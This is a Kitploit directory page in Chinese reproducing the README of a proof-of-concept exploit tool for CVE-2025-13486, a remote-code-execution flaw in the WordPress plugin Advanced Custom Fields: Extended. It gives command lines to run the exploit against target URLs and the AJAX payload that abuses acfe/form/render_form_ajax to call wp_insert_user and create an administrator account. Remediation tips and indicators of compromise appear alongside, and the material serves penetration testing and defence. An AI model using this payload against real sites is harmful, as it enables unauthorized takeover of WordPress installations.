Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-13486 — Advanced Custom Fields Extended (ACFE) WordPress 插件漏洞利用 RCE - 管理员创建 | Kitploit
工具/GitHubGitHub/0xgh057r3c0n/cve-2025-13486
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHub0xgh057r3c0n/cve-2025-13486

CVE-2025-13486

Advanced Custom Fields Extended (ACFE) WordPress 插件漏洞利用 RCE - 管理员创建

查看仓库
1119个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🔴 CVE-2025-13486 - Advanced Custom Fields Extended (ACFE) WordPress插件利用工具

WordPress Python License Status

WordPress 标志

📋 概述

CVE-2025-13486 的概念验证利用工具,该漏洞是 Advanced Custom Fields: Extended (ACFE) WordPress 插件中的一个严重漏洞,允许远程代码执行,进而实现权限提升。

🎯 漏洞详情

方面详情
CVE IDCVE-2025-13486
插件Advanced Custom Fields: Extended (ACFE)
类型远程代码执行 → 权限提升
风险等级严重
受影响版本ACFE 存在漏洞的版本(具体版本待定)
CVSS 分数9.8 严重
发现日期2025 年
作者0xgh057r3c0n

⚠️ 道德使用声明

⚠️ 警告:此工具仅用于授权安全测试和教育目的。

✅ 允许的使用场景:

  • 安全研究与教育
  • 测试您自己的系统
  • 获得书面授权的渗透测试
  • 学术研究与教学
  • 安全意识培训

❌ 禁止的使用场景:

  • 对您不拥有的系统进行未授权测试
  • 恶意攻击或黑客行为
  • 任何非法活动
  • 违反计算机欺诈法律(如 CFAA 等)
  • 不道德的安全测试

作者不对任何滥用此工具的行为负责。请始终在获得适当书面授权后再测试任何系统。

🔧 特性

🔍 验证模式

  • 从 WordPress 页面提取 nonce
  • 使用 print_r 函数确认漏洞
  • 安全验证,不进行利用
  • 多种模式匹配以检测 nonce

⚡ 利用模式

  • 通过 wp_insert_user 创建管理员用户
  • 自定义或随机生成的凭据
  • 支持自定义用户名、密码和电子邮件
  • 响应分析以识别成功标志

🛠️ 技术特性

  • 自动协议检测(HTTP/HTTPS)
  • 彩色终端输出
  • 测试环境下的 SSL 验证绕过
  • 详细的错误报告与调试
  • 会话超时与连接处理

📦 安装

要求

  • Python 3.6+
  • requests 库

设置

root@kitploit:~
# 克隆仓库
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486

# 安装依赖
pip install requests

# 或通过 requirements.txt 安装
pip install -r requirements.txt

# 赋予脚本可执行权限(Linux/Mac)
chmod +x exploit.py

依赖项

创建 requirements.txt 文件:

root@kitploit:~
requests>=2.25.1

🚀 使用方法

基本语法

root@kitploit:~
python3 exploit.py --url <TARGET_URL> [选项]

示例

1. 仅验证漏洞(安全测试)

root@kitploit:~
python3 exploit.py --url http://target.com --verify

2. 使用随机凭据进行利用

root@kitploit:~
python3 exploit.py --url https://target.com

3. 使用自定义凭据进行利用

root@kitploit:~
python3 exploit.py --url https://target.com \
  --user backup_admin \
  --password "P@ssw0rd123!" \
  --email [email protected]

4. 目标不指定协议(自动检测)

root@kitploit:~
python3 exploit.py --url target.com --verify

命令行选项

🧪 工作原理

1. 漏洞机制

该利用工具利用了 ACFE 插件中 acfe/form/render_form_ajax 端点对函数处理不当的漏洞,允许攻击者调用任意 PHP 函数。

2. 技术流程

root@kitploit:~
1. URL 验证 → 自动检测 HTTP/HTTPS
2. Nonce 提取 → 扫描页面获取 ACF nonce
3. 载荷构建 → 构造恶意 AJAX 请求
4. 请求执行 → 向目标发送利用载荷
5. 结果分析 → 检查成功标志

3. 利用载荷

root@kitploit:~
// ACFE 中的漏洞代码模式
$result = call_user_func_array($form['render'], array($form));

// 利用载荷结构
{
    "action": "acfe/form/render_form_ajax",
    "nonce": "提取到的_nonce",
    "form[render]": "wp_insert_user",
    "form[user_login]": "攻击者用户名",
    "form[user_pass]": "攻击者密码",
    "form[user_email]": "攻击者@email.com",
    "form[role]": "administrator"
}

🛡️ 修复建议

立即采取的措施

  1. 更新插件:立即将 ACFE 插件更新到最新版本
  2. 移除插件:如果无法更新,暂时禁用 ACFE
  3. Web 应用防火墙:部署 WAF 规则以阻止恶意请求
  4. 监控:监控可疑的管理员用户创建行为

WordPress 安全加固

root@kitploit:~
# 推荐的安全插件
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security

# 服务器级保护
- 实施速率限制
- 启用 mod_security 规则
- 使用 Cloudflare 或类似 CDN
- 定期进行安全审计

🔍 检测方法

入侵指标 (IOCs)

  • 未授权的管理员用户创建
  • 针对 /wp-admin/admin-ajax.php 的可疑 AJAX 请求
  • 带有 action=acfe/form/render_form_ajax 的请求
  • 通过 AJAX 调用的意外 wp_insert_user 函数

日志监控

root@kitploit:~
# Apache 日志
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"

# WordPress 调试日志
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);

📚 参考资料

  1. WordPress 插件仓库:Advanced Custom Fields: Extended
  2. CVE 数据库:CVE-2025-13486
  3. WordPress 安全团队:插件安全指南
  4. OWASP Top 10:注入攻击

🤝 贡献指南

  1. Fork 该仓库
  2. 创建功能分支(git checkout -b feature/improvement)
  3. 提交更改(git commit -am '添加新功能')
  4. 推送到分支(git push origin feature/improvement)
  5. 创建 Pull Request

贡献者准则

  • 遵循 PEP 8 Python 风格指南
  • 对复杂逻辑添加注释
  • 包含错误处理
  • 更新文档

🐛 报告问题

请通过以下方式报告错误和问题:

  1. GitHub Issues:创建新 Issue
  2. 安全漏洞:首先向作者进行负责任的披露

📊 项目结构

root@kitploit:~
CVE-2025-13486/
├── exploit.py          # 主要利用脚本
├── README.md           # 本文档
├── requirements.txt    # Python 依赖
├── LICENSE            # MIT 许可证文件
├── examples/          # 使用示例
│   ├── verification.txt
│   └── exploitation.txt
└── tests/             # 测试脚本
    ├── test_verify.py
    └── test_exploit.py

👨‍💻 作者

0xgh057r3c0n - 安全研究员

  • GitHub: @0xgh057r3c0n
  • Twitter: @0xgh057r3c0n

📜 许可证

本项目采用 MIT 许可证 - 详见 LICENSE 文件。

用 ❤️ 为安全社区构建
⚠️ 请负责任且道德地使用 ⚠️

下载工具
选项描述是否必需默认值
-u, --url目标 WordPress URL是-
--verify仅验证,不进行利用否False
--user管理员自定义用户名否admin_XXXXX
--password管理员自定义密码否随机 12 位字符
--email管理员自定义邮箱否[email protected]